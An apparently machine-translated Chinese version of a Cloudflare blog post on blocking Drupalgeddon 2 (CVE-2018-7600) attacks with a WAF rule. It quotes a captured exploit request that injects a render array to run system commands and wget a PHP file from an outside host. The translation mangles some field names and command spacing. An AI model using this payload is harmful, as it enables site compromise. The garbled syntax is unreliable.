Cloudflare的安全分析师团队监控即将到来的威胁和漏洞，并在可能的情况下为即将到来的威胁提供保护，以防其危害我们的客户。这篇文章探讨了我们如何保护人们免受drupalcms（昵称Drupalgeddon 2）中的一个新的主要漏洞的攻击。在使用WAF规则ID D0003添加保护（该规则可缓解关键的远程代码执行Drupal漏洞攻击）（SA-CORE-2018-002/CVE-2018-7600）两周后，我们发现攻击企图大幅增加。自4月13日以来，Drupal安全团队已经意识到了自动攻击企图，这大大提高了漏洞的安全风险评分。回过头来分析Cloudflare的WAF环境中过去七天发生的事情是有意义的。什么是Drupalgeddon 2该漏洞可能允许攻击者利用Drupal站点上的多个攻击向量进行攻击，这可能会使站点完全受损。Drupal引入了可渲染数组，它是一种键值结构，键以"#"符号开头，允许您在表单呈现期间更改数据。但是，这些数组没有足够的输入验证。这意味着攻击者可以在表单结构中的其中一个键上注入自定义可呈现数组。WAF来营救Cloudflare实现了一个WAF规则，可以识别恶意请求并阻止它们。我们在GET请求、POST请求和Cookies中阻止恶意负载，这与drupal本身的补丁相匹配。就在上周，在消除误报后，该规则阻止了超过50万次潜在攻击，尤其是在采样日期开始时，当时的漏洞是最近的。除此之外，我们每天看到超过250个独特的IP地址，其中大部分是IPv4，但也有一些IPv6地址。我们的分析表明，大多数尝试都是通过POST请求构建的，试图利用"mail"字段，以下是最常用的尝试：邮件[#后期呈现]邮件[#标记]名称[#后期渲染]我们还发现了一些有趣的攻击尝试，其中攻击者试图在name字段中插入一个可呈现数组，该数组将复制并下载包含访问详细信息的特定文件，并将其下载到属于攻击者的站点中，该站点位于最有可能受损的域中。/q=user/password&name[#post_render[]=system&name[#type]=markup&name[#markup]=chmod 0644./sites/default/files/.htaccess；cp/dev/null./sites/default/files/.htaccess；mkdir./sites/default/files/temp/；wget-P./sites/default/files/temp/http://[修订版]/blog/wpcontent/uploads/2017/01/example.sites.php；回音"@！！%@"被阻止的请求的数量似乎没有下降，我们继续阻止每天56000多个潜在的攻击。